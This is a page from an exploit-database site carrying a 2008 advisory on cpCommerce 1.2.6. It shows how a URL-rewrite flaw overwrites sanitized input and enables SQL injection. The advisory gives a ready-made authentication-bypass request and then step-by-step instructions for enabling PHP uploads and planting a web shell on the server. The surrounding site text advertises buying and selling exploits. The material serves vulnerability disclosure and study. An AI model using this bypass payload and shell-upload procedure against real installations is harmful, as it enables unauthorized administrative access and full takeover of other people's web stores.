0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
cpCommerce 1.2.6 (URL Rewrite) Input variable overwrite / Auth bypass
===================================================================== cpCommerce 1.2.6 (URL Rewrite) Input variable overwrite / Auth bypass ===================================================================== Author: girex CMS: cpCommerce 1.2.6 Site: http://cpcommerce.cpradio.org/ Bug: URL Rewrite -> Input variables overwrite PoC: Auth bypass -> Shell upload Note: Works regardless php.ini settings Vendor informed: 23/11/08 cpCommerce 1.2.7 released: 30/11/08 Public advisory: 30/11/08 ------------------------------------------------------------------------------------------------- CMS Description: cpCommerce is an open-source e-commerce solution that is maintained by templates and modules. ------------------------------------------------------------------------------------------------- Vulnerability discussion: cpCommerce sets register_globals to Off with ini_set and stores all GET and POST variables into $input array after have addslashed them. lines: 16-32 file: /functions/sanitize_value.func.php function SanitizeInput() { $input = array(); if (isset($_GET) && sizeof($_GET) > 0 && is_array($_GET)) { foreach ($_GET as $key => $val) { if (is_array($val)) { $input[$key] = SanitizeArray($val); } else { $input[$key] = SanitizeValue($val); } } } ... and does the same for POST vars lines: 3-13 function SanitizeValue($value) { if (!get_magic_quotes_gpc()) { return addslashes(preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES))); } else { return preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES)); } } ------------------------------------------------------------------------------------------------- Let we see _funcions.php (the mainfile) lines: 128-132 file: _functions.php $input = array(); if ((isset($_GET) && sizeof($_GET) > 0) || (isset($_POST) && sizeof($_POST) > 0)) { $input = SanitizeInput(); } So, all GET and POST vars ar sanitized and stored into $input array. Let we procede in _functions.php... ------------------------------------------------------------------------------------------------- lines 156-173 file: _functions.php if (isset($_SERVER['PATH_INFO']) && strlen($_SERVER['PATH_INFO']) != 0) { $rewriteValues = array(); if (strrpos($_SERVER['PATH_INFO'], '/') == strlen($_SERVER['PATH_INFO']) - 1) { $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 2)); } else { $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 1)); } for ($i = 0; $i < sizeof($rewriteValues); $i += 2) { $input[$rewriteValues[$i]] = $rewriteValues[$i + 1]; } } $_SERVER['PATH_INFO'] is a SERVER var that contains the request url after the request page For example: GET http://localhost/index.php/helloword /index.php is the page requested and $_SERVER['PATH_INFO'] contains /helloword As you can see from previous snipplet of code we can set $input content with GET index.php/key/value/ So we can overwrite all inputs data in this cms, bypassing SanitazeInput() and the effect of magic_quotes How we'll exploit that.... ------------------------------------------------------------------------------------------------- lines: 13-20 code: /actions/login.act.php if (checkSession($input['email'], md5($input['password']))) { $_SESSION['cpTemplate'] = $_SESSION['cpInfo']['template']; $return['url'] = urldecode("{$input['returnurl']}"); } else { $_SESSION['loginerror'] = TRUE; $return['url'] = urldecode("{$input['returnurl']}"); } If checkSession returns true we are logged in... lines: 3-9 code: /functions/account_info.func.php function checkSession($email,$pass) { global $config, $db_chooser; $sql['accounts'] = "select `id_account`, `level` from " . $db_chooser->Accounts() . " where " . "email='$email' and pass='$pass'"; $accounts = $db_chooser->sql_query($sql['accounts']); We can manipulate this query having a SQL Injection with an auth bypass logging in with admin priviledges... ------------------------------------------------------------------------------------------------- If we set $input['email'] to: ' OR id_account=1# with the trick of PATH_INFO (index.php/email/value) the resulting query will be: select `id_account`, `level` from cpAccounts where email='' OR id_account=1 ------------------------------------------------------------------------------------------------- PoC Auth Bypass: GET http://[host]/[path]/index.php/email/%27%20OR%20id_account=1%23/?action=login&submit=Login&returnurl=index.php ------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------- If you want to upload a shell: - Log in with the auth bypass PoC - Go to /[path]/admin/ - Go to General Info -> Configuration - Add ,php in What Image Extensions do you want to accept on Uploads? - Go to Product -> Create - Select a right category - Fill required fields - Upload your shell.php in Product Thumbnail Image - Save all Your shell wil be at /[path]/images/products/thumbnails/[name_of_shell]_[product_id].php ------------------------------------------------------------------------------------------------- # 0day.today [2024-12-24] #